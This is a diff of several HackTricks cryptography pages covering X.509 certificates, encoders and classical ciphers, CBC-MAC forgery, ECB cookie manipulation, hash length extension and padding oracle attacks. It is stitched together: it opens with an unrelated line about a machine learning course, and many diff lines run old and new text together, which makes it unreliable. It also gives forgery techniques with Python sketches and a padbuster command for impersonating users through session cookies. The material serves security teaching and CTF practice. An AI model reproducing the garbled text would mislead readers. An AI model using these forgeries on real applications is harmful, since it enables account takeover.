The only drawback I could find was the occasional lack of mathematical explanation of how the algorithm used works. However, this course is **pretty useful for people that are learning about Machine Learning**.

#
<details>
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>

# What is a Certificate

In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.
@@ -27,7 +25,7 @@ In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-ke

The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure (X.509)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280.

# x509 Common Fields

* **Version Number:** Version of x509 format.
* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information.
@@ -70,13 +68,13 @@ The most common format for public key certificates is defined by [X.509](https:/

* **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate.
* **CT Precertificate SCTs**: Certificate Transparency logs regarding the certificate

## Difference between OCSP and CRL Distribution Points
**OCSP** (RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.\
**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\
From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm#:\~:text=OCSP%20\(RFC%202560\)%20is%20a,to%20download%20the%20entire%20CRL.\&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.).

## What is Certificate Transparency

Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. Specifically, Certificate Transparency has three main goals:
@@ -84,19 +82,19 @@ Certificate Transparency aims to remedy certificate-based threats by **making th

* Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously** issued.
* **Protect users** (as much as possible) from being duped by certificates that were mistakenly or maliciously issued.

### **Certificate Logs**

Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. **Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesn't have to be large (say, much less than a thousand worldwide), and each could be operated independently by a CA, an ISP, or any other interested party.

### Query

You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh).
# Formats

There are different formats that can be used to store a certificate.

### **PEM Format**

* It is the most common format used for certificates
* Most servers (e.g. Apache) expect the certificates and private key to be in separate files\
@@ -104,7 +102,7 @@ There are different formats that can be used to store a certificate.

\- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\
\- Apache and similar servers use PEM format certificates
### **DER Format**

* The DER format is the binary form of the certificate
* All types of certificates & private keys can be encoded in DER format

@@ -112,19 +110,19 @@ There are different formats that can be used to store a certificate.

* DER formatted certificates most often use the .cer and '.der' extensions
* DER is typically used in Java Platforms
### **P7B/PKCS#7 Format**

* The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c
* A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key
* The most common platforms that support P7B files are Microsoft Windows and Java Tomcat

### **PFX/P12/PKCS#12 Format**

* The PKCS#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file
* These files usually have extensions such as .pfx and .p12
* They are typically used on Windows machines to import and export certificates and private keys

## Format conversions

**Convert x509 to PEM**
@@ -132,7 +130,7 @@ There are different formats that can be used to store a certificate.
openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
```

### **Convert PEM to DER**

```
openssl x509 -outform der -in certificatename.pem -out certificatename.der
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>

# CBC

If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**", you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie.

# CBC-MAC

In cryptography, a **cipher block chaining message authentication code** (**CBC-MAC**) is a technique for constructing a message authentication code from a block cipher. The message is encrypted with some block cipher algorithm in CBC mode to create a **chain of blocks such that each block depends on the proper encryption of the previous block**. This interdependence ensures that a **change** to **any** of the plaintext **bits** will cause the **final encrypted block** to **change** in a way that cannot be predicted or counteracted without knowing the key to the block cipher.
@@ -31,7 +29,7 @@ To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero init

![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)

# Vulnerability

With CBC-MAC usually the **IV used is 0**.\
This is a problem because 2 known messages (`m1` and `m2`) will independently generate 2 signatures (`s1` and `s2`). So:
@@ -55,19 +53,19 @@ You can create a username called **Administ** (m1) and retrieve the signature (s

Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)`, which is s32.\
Now, you can use s32 as the signature of the full name **Administrator**.

### Summary

1. Get the signature of username **Administ** (m1), which is s1
2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0**, which is s32**.**
3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**.
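The concatenation forgery above can be sketched in Python. A SHA-256-based toy function stands in for the block cipher (purely illustrative — the server's real cipher and key stay secret; any deterministic block function shows the same math):

```python
import hashlib

BLOCK = 8  # the example in the text uses 8-byte blocks

def E(key, block):
    # toy deterministic stand-in for the keyed block cipher (illustration only)
    return hashlib.sha256(key + block).digest()[:BLOCK]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_mac(key, msg, iv=bytes(BLOCK)):
    # CBC-MAC with zero IV: each block is E(previous_output XOR block)
    state = iv
    for i in range(0, len(msg), BLOCK):
        state = E(key, xor(state, msg[i:i + BLOCK]))
    return state

key = b"server-secret"                    # unknown to the attacker
s1 = cbc_mac(key, b"Administ")            # leaked signature of username 1
s2 = cbc_mac(key, b"rator\x00\x00\x00")   # leaked signature of username 2

# Forge without the key: MAC("Administ" || ("rator\x00\x00\x00" XOR s1)) == s2
forged = b"Administ" + xor(b"rator\x00\x00\x00", s1)
assert cbc_mac(key, forged) == s2
```

The second block's input is `(m2 XOR s1) XOR s1 = m2`, so the chain collapses to `E(m2) = s2`, exactly as described in the summary.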
# Attack Controlling IV

If you can control the used IV the attack could be very easy.\
If the cookie is just the encrypted username, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get its cookie.\
Now, if you can control the IV, you can change the first byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**.
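This IV trick can be sketched with the same kind of toy block-cipher stand-in (illustrative only — the flip works because only the first block's input `IV XOR plaintext` matters):

```python
import hashlib

BLOCK = 16

def E(key, block):
    # toy deterministic stand-in for the keyed block cipher (illustration only)
    return hashlib.sha256(key + block).digest()[:BLOCK]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def mac_with_iv(key, msg, iv):
    state = iv
    for i in range(0, len(msg), BLOCK):
        state = E(key, xor(state, msg[i:i + BLOCK]))
    return state

key = b"server-secret"                          # unknown to the attacker
iv = bytes(range(BLOCK))                        # IV the server will verify with
target = b"administrator".ljust(BLOCK, b"\x00") # user we want to impersonate
created = b"Administrator".ljust(BLOCK, b"\x00")# user we can register

# Choose IV' so that IV'[0] XOR "A" == IV[0] XOR "a"
iv2 = bytes([iv[0] ^ ord("A") ^ ord("a")]) + iv[1:]
cookie = mac_with_iv(key, created, iv2)  # cookie obtained for "Administrator"
assert cookie == mac_with_iv(key, target, iv)  # valid for "administrator"
```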
# References

More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>

# Online Hashes DBs

* _**Google it**_
* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
@@ -33,33 +31,33 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)

# Magic Autosolvers

* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module)
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
# Encoders

Most encoded data can be decoded with these 2 resources:

* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)

## Substitution Autosolvers

* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
* [https://quipqiup.com/](https://quipqiup.com) - Very good!
### Caesar - ROTx Autosolvers

* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
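If the online breaker is unavailable, brute-forcing all 26 rotations offline is a one-liner — a minimal sketch:

```python
def caesar_shift(text, k):
    # rotate alphabetic characters by k positions, leave everything else alone
    out = []
    for c in text:
        if c.isalpha():
            base = ord("A") if c.isupper() else ord("a")
            out.append(chr((ord(c) - base + k) % 26 + base))
        else:
            out.append(c)
    return "".join(out)

def caesar_bruteforce(ciphertext):
    # offline autosolver: return all 26 candidate plaintexts, keyed by shift
    return {k: caesar_shift(ciphertext, k) for k in range(26)}

candidates = caesar_bruteforce("uryyb jbeyq")
assert candidates[13] == "hello world"  # ROT13
```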
### Atbash Cipher

* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)

## Base Encodings Autosolver

Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
@@ -132,7 +130,7 @@ Check all these bases with: [https://github.com/dhondta/python-codext](https://g

[http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)

## HackerizeXS \[_╫Λ↻├☰┏_]

```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
@@ -140,7 +138,7 @@ Check all these bases with: [https://github.com/dhondta/python-codext](https://g

* [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)

## Morse

```
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
@@ -148,7 +146,7 @@ Check all these bases with: [https://github.com/dhondta/python-codext](https://g

* [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)

## UUencoder

```
begin 644 webutils_pl
@@ -161,7 +159,7 @@ end

* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)

## XXEncoder

```
begin 644 webutils_pl
@@ -172,7 +170,7 @@ end

* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)

## YEncoder

```
=ybegin line=128 size=28 name=webutils_pl
@@ -182,7 +180,7 @@ ryvkryvkryvkryvkryvkryvkryvk

* [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)

## BinHex

```
(This file must be converted with BinHex 4.0)
@@ -192,7 +190,7 @@ ryvkryvkryvkryvkryvkryvkryvk

* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)

## ASCII85

```
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
@@ -200,7 +198,7 @@ ryvkryvkryvkryvkryvkryvkryvk

* [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)

## Dvorak keyboard

```
drnajapajrna
@@ -208,7 +206,7 @@ drnajapajrna

* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard)

## A1Z26

Letters to their numerical value
@@ -216,7 +214,7 @@ Letters to their numerical value
8 15 12 1 3 1 18 1 3 15 12 1
```
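Decoding A1Z26 is trivial to do offline — a minimal sketch that turns the sample above back into letters:

```python
def a1z26_decode(s):
    # map each space-separated number 1-26 back to its letter (1=A ... 26=Z)
    return "".join(chr(int(n) + 64) for n in s.split())

assert a1z26_decode("8 15 12 1 3 1 18 1 3 15 12 1") == "HOLACARACOLA"
```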
## Affine Cipher Encode

Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter

@@ -224,7 +222,7 @@ Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and t
krodfdudfrod
```
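The `(ax+b)%26` formula can be sketched in a few lines; decoding needs the modular inverse of _a_. The keys `a=5, b=8` below are just example values, not the keys of the sample ciphertext:

```python
def affine_encode(text, a, b):
    # lowercase letter -> number, apply (a*x + b) % 26, back to letter
    return "".join(chr((a * (ord(c) - 97) + b) % 26 + 97) for c in text)

def affine_decode(text, a, b):
    a_inv = pow(a, -1, 26)  # modular inverse; a must be coprime with 26
    return "".join(chr(a_inv * ((ord(c) - 97) - b) % 26 + 97) for c in text)

ct = affine_encode("hackthebox", 5, 8)
assert affine_decode(ct, 5, 8) == "hackthebox"
```

When the keys are unknown there are only 12 valid values of _a_ (coprime with 26) times 26 values of _b_, so brute force is cheap.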
## SMS Code

**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (this mode is used when writing SMS).\
For example: 2=A, 22=B, 222=C, 3=D...\

@@ -232,7 +230,7 @@ You can identify this code because you will see** several numbers repeated**.

You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
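A minimal offline decoder for space-separated multitap groups (each group is one key pressed N times, giving the Nth letter on that key):

```python
KEYS = {"2": "abc", "3": "def", "4": "ghi", "5": "jkl",
        "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz"}

def multitap_decode(code):
    # "44" = key 4 pressed twice -> second letter on key 4 -> "h"
    return "".join(KEYS[g[0]][len(g) - 1] for g in code.split())

assert multitap_decode("44 666 555 2") == "hola"
```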
### Bacon Code ## Bacon Code
Substitute each letter with 5 As or Bs (or 1s and 0s) Substitute each letter with 5 As or Bs (or 1s and 0s)
@ -241,21 +239,21 @@ Substitude each letter for 4 As or Bs (or 1s and 0s)
AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
``` ```
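The example above uses the classic 24-letter variant (I/J and U/V share a code); a decoder sketch:

```python
# 24-letter Bacon alphabet: I/J and U/V each share one code
ALPHABET = "abcdefghiklmnopqrstuwxyz"

def bacon_decode(groups: str) -> str:
    # Each 5-symbol group is a binary number indexing into the alphabet
    return "".join(ALPHABET[int(g.replace('A', '0').replace('B', '1'), 2)]
                   for g in groups.split())

print(bacon_decode("AABBB ABBAB ABABA AAAAA"))  # hola
```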
### Runes ## Runes
![](../.gitbook/assets/runes.jpg) ![](../.gitbook/assets/runes.jpg)
## Compression # Compression
**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers. **Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers.
## Easy Crypto # Easy Crypto
### XOR - Autosolver ## XOR - Autosolver
* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/) * [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
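The single-byte case is easy to brute-force offline; a rough sketch that scores each candidate key by English-like character frequency:

```python
def xor_single_byte_bruteforce(data: bytes):
    # Try all 256 keys; keep the candidate that looks most like English text
    def score(candidate: bytes) -> int:
        return sum(c in b" etaoinshrdlu" for c in candidate.lower())
    key = max(range(256), key=lambda k: score(bytes(b ^ k for b in data)))
    return key, bytes(b ^ key for b in data)
```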
### Bifid ## Bifid
A keyword is needed A keyword is needed
@ -263,7 +261,7 @@ A keywork is needed
fgaargaamnlunesuneoa fgaargaamnlunesuneoa
``` ```
### Vigenere ## Vigenere
A keyword is needed A keyword is needed
@ -275,9 +273,9 @@ wodsyoidrods
* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) * [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) * [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
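The decryption itself is just per-letter shifting by the repeating key; a sketch for lowercase input:

```python
def vigenere_decrypt(ciphertext: str, key: str) -> str:
    out = []
    for i, c in enumerate(ciphertext):
        # Shift each letter back by the corresponding key letter
        shift = ord(key[i % len(key)]) - ord('a')
        out.append(chr((ord(c) - ord('a') - shift) % 26 + ord('a')))
    return "".join(out)

print(vigenere_decrypt("rijvs", "key"))  # hello
```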
## Strong Crypto # Strong Crypto
### Fernet ## Fernet
2 base64 strings (token and key) 2 base64 strings (token and key)
@ -291,7 +289,7 @@ Key:
* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) * [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
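A quick way to test a candidate token/key pair locally is Python's `cryptography` package (a third-party dependency, `pip install cryptography`):

```python
# Requires: pip install cryptography
from cryptography.fernet import Fernet

key = Fernet.generate_key()                   # urlsafe-base64 key
token = Fernet(key).encrypt(b"secret data")   # urlsafe-base64 token
print(Fernet(key).decrypt(token))             # b'secret data'
```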
### Shamir Secret Sharing ## Shamir Secret Sharing
A secret is split into X parts and to recover it you need Y parts (_Y <= X_). A secret is split into X parts and to recover it you need Y parts (_Y <= X_).
@ -303,12 +301,12 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
### OpenSSL brute-force ## OpenSSL brute-force
* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
* [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF) * [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
## Tools # Tools
* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Electronic Code Book (ECB) # ECB
## ECB
(ECB) Electronic Code Book - a symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depending on the block size of the input data and the encryption algorithm) and then to encrypt (decrypt) each block of clear text using the same key. (ECB) Electronic Code Book - a symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depending on the block size of the input data and the encryption algorithm) and then to encrypt (decrypt) each block of clear text using the same key.
@ -30,7 +28,7 @@ Using ECB has multiple security implications:
* **Blocks from encrypted message can be removed** * **Blocks from encrypted message can be removed**
* **Blocks from encrypted message can be moved around** * **Blocks from encrypted message can be moved around**
## Detection of the vulnerability # Detection of the vulnerability
Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`<username>|<password>`**.\ Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`<username>|<password>`**.\
Then, you generate two new users, both of them with the **same long password** and **almost** the **same** **username**.\ Then, you generate two new users, both of them with the **same long password** and **almost** the **same** **username**.\
@ -56,9 +54,9 @@ Now, the attacker just need to discover if the format is `<username><delimiter><
| 4 | 4 | 8 | 16 | | 4 | 4 | 8 | 16 |
| 7 | 7 | 14 | 16 | | 7 | 7 | 14 | 16 |
## Exploitation of the vulnerability # Exploitation of the vulnerability
### Removing entire blocks ## Removing entire blocks
Knowing the format of the cookie (`<username>|<password>`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it: Knowing the format of the cookie (`<username>|<password>`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it:
@ -73,7 +71,7 @@ Then, you can remove the first block of 8B and you will et a valid cookie for th
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
``` ```
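The key property is that each block is transformed independently, so ciphertext can be cut on block boundaries. A toy demonstration (a byte-wise XOR stands in for the real block cipher here; not real crypto):

```python
BLOCK = 8

def toy_ecb(data: bytes, key: int) -> bytes:
    # Stand-in for an ECB block cipher: every block transformed independently
    return bytes(b ^ key for b in data)

cookie = toy_ecb(b"aaaaaaaa" + b"admin|password12", 0x42)  # 3 blocks of 8 bytes
cut = cookie[BLOCK:]                                       # drop the first block
print(toy_ecb(cut, 0x42))                                  # b'admin|password12'
```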
### Moving blocks ## Moving blocks
In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_ In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_
@ -86,7 +84,7 @@ The cookie of this user is going to be composed by 3 blocks: the first 2 is the
**Then, just replace the first block with the last one and you will be impersonating the user `admin`: `admin |username`** **Then, just replace the first block with the last one and you will be impersonating the user `admin`: `admin |username`**
## References # References
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Hash Length Extension Attack # Summary of the attack
## Summary of the attack
Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know: Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
@ -32,7 +30,7 @@ Imagine a server which is **signing** some **data** by **appending** a **secret*
Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previous data + appended data**. Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previous data + appended data**.
### How? ## How?
Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**. Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**.
@ -44,11 +42,11 @@ If an attacker wants to append the string "append" he can:
* Append the string "append" * Append the string "append"
* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"** * Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"**
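The attacker must place the original padding between the known data and the appended bytes; a sketch of how that "glue" padding is computed for MD5-style (64-byte block) hashes, assuming the secret's length is known:

```python
import struct

def md_glue_padding(total_len: int) -> bytes:
    # Padding for a message of total_len bytes (len(secret) + len(data)):
    # a 0x80 byte, zeros up to 56 mod 64, then the 8-byte bit length
    pad = b"\x80" + b"\x00" * ((55 - total_len) % 64)
    return pad + struct.pack("<Q", total_len * 8)  # MD5: little-endian; SHA1/SHA256 use ">Q"

padding = md_glue_padding(len(b"secret") + len(b"data"))
# secret + data + padding now ends on a 64-byte block boundary
```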
### **Tool** ## **Tool**
{% embed url="https://github.com/iagox86/hash_extender" %} {% embed url="https://github.com/iagox86/hash_extender" %}
## References # References
You can find this attack well explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) You can find this attack well explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Padding Oracle # CBC - Cipher Block Chaining
## CBC - Cipher Block Chaining
In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: In CBC mode the **previous encrypted block is used as IV** to XOR with the next block:
@ -31,7 +29,7 @@ To decrypt CBC the **opposite** **operations** are done:
Notice how it's needed to use an **encryption** **key** and an **IV**. Notice how it's needed to use an **encryption** **key** and an **IV**.
## Message Padding # Message Padding
As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\ As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\
Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`. Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`.
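A sketch of PKCS7 padding and the strict check that a padding oracle effectively exposes:

```python
def pkcs7_pad(data: bytes, block: int = 8) -> bytes:
    n = block - len(data) % block          # a full extra block if already aligned
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not (1 <= n <= len(data) and data.endswith(bytes([n]) * n)):
        raise ValueError("invalid padding")  # this error is what the oracle leaks
    return data[:-n]

print(pkcs7_pad(b"12345", 8))  # b'12345\x03\x03\x03'
```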
@ -47,13 +45,13 @@ Let's look at more examples with a **2 blocks of length 8bytes**:
Note how in the last example the **last block was full so another one was generated only with padding**. Note how in the last example the **last block was full so another one was generated only with padding**.
## Padding Oracle # Padding Oracle
When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**. When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**.
If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**. If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**.
### How to exploit ## How to exploit
You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do
@ -81,7 +79,7 @@ If the site is vulnerable `padbuster`will automatically try to find when the pad
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
``` ```
### The theory ## The theory
In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**. In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**.
@ -110,7 +108,7 @@ Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
**Follow this chain until you decrypt the whole encrypted text.** **Follow this chain until you decrypt the whole encrypted text.**
